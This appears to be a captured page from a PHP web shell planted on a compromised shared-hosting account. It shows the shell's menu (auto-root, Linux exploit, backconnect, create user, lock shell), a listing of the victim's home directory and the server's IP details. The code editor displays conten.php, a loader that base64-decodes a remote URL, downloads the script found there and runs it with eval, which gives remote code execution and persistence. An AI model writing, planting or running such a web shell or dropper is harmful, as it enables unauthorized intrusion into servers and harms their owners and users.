Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
[ HOME SHELL ]
Name
Size
Permission
Action
.ssh
[ DIR ]
drwxr-xr-x
etc
[ DIR ]
drwxr-xr-x
filecontainer
[ DIR ]
drwx---r-x
mail
[ DIR ]
drwxr-xr-x
possoz
[ DIR ]
drwx---r-x
www
[ DIR ]
drwxrwxrwx
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
24
B
-rw-------
.ovhconfig
106
B
-rw----r--
.wget-hsts
182
B
-rw-rw-rw-
conten.php
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : conten.php
<?php function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } $x = '?>'; $url1 = base64_decode('aHR0cHM6Ly95b2licmUuY29tL3NoZWxsL3BlbGVybGVtYnVjdXJsLnR4dA=='); $url2 = base64_decode('aHR0cHM6Ly95b2licmUuY29tL3NoZWxsL3BlbGVybGVtYnVjdXJsLnR4dA=='); $script1 = get($url1); if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "Both attempts failed."; } } ?>
Close